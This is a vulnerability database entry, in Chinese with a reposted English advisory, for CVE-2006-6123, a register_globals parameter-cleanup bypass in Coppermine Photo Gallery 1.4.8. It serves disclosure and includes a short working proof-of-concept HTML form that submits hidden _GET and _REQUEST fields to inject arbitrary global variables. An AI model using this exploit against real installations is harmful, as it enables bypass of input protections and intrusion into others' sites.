Coppermine Photo Gallery 认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192777 漏洞类型 未知
发布时间 2006-11-26 更新时间 2006-11-26
CVE编号 CVE-2006-6123 CNNVD-ID CNNVD-200611-419
漏洞平台 N/A CVSS评分 2.6
|漏洞来源
https://www.securityfocus.com/bid/87211
https://cxsecurity.com/issue/WLB-2006110116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-419
|漏洞详情
CopperminePhotoGallery(CPG)1.4.8stable版本,当系统启用register_globals时,远程攻击者可通过一个query字符串,使得系统在全域空间内定义变量(带有单独的_GET、_REQUEST或其他关键参数,而这些参数在保护模式中没有设置,且阻止初始变量被侦测到),从而绕过XSS保护并设置任意变量。
|漏洞EXP
——————-Summary—————-
Software: CPG Coppermine Photo Gallery
Sowtware’s Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote
Status: Unpatched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: High
—————–Description—————
Coppermine Photo Gallery has a logical design fault that will result to bypassing anti-XSS-Injection–RegGlobal-System.

It is because that process of cleaning user suplied data checks that if we have any varable
that exists in querystrings(or same)? If so it deletes that varable.Cause of this approach we can delete predefined varables(e.g _GET&_POST) that has defined arbitary varables before that it delete, and cleanup system will bypass with this trick.
Imagine that Register globals is on. you request a url with this parameters in Mixed Get and Post Request:

<form method=post action=&#8221;cpg/?MyVar=value&#8221;>
<input name=_GET type=hidden>
<input name=_REQUEST type=hidden>
<input type=submit></form>

It will append MyVar as a varable with arbitarry value before php scripts handles process{cause of register globals} and after that it give handle, predefined _GET&_REQUEST varables will delete. So our varable is unaccessable for checking and deleting but it exists in global area.
Don&#8217;t forget that if you like to post some other standard parameters to program, you sould not use get after here.But e.g. use post. I mean that you inject your parameter with get array and pass standard parameters (e.g. pic number or page number) with post or so&#8230; BTW you sould just one of this arrays in one time.
Cause of this bug you can create your own parameters that will attend after on source code.
&#8212;&#8212;&#8212;&#8212;&#8211;See Also&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;
{include/init.inc.php}40-101
/*cause of extra size of code I dont include them here*/
&#8212;&#8212;&#8212;&#8212;&#8211;Exploit&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-
<form method=post action=&#8221;cpg/?MyVar=value&#8221;>
<input name=_GET type=hidden>
<input name=_REQUEST type=hidden>
<input type=submit></form>
&#8212;&#8212;&#8212;&#8212;&#8211;Conditions&#8212;&#8212;&#8212;&#8212;&#8211;
Register Globals Should Be ON
&#8212;&#8212;&#8212;&#8212;&#8211;Credit&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security 

|受影响的产品
Coppermine Coppermine Photo Gallery 1.4.8 Stable
|参考资料

来源:XF
名称:coppermine-init-security-bypass(27376)
链接:http://xforce.iss.net/xforce/xfdb/27376
来源:OSVDB
名称:27618
链接:http://www.osvdb.org/27618
来源:svn.sourceforge.net
链接:http://svn.sourceforge.net/viewvc/coppermine?view=rev&revision=3133
来源:SECUNIA
名称:20597
链接:http://secunia.com/advisories/20597
来源:MISC
链接:http://myimei.com/security/2006-06-20/coppermine-148parameter-cleanup-system-bypassregistering-global-varables.html
来源:BUGTRAQ
名称:20060623[KAPDA]Coppermine1.4.8~ParameterCleanupSystemByPass~RegisteringGlobalVarables
链接:http://archives.neohapsis.com/archives/bugtraq/2006-06/0482.html
来源:SREASON
名称:1914
链接:http://securityreason.com/securityalert/1914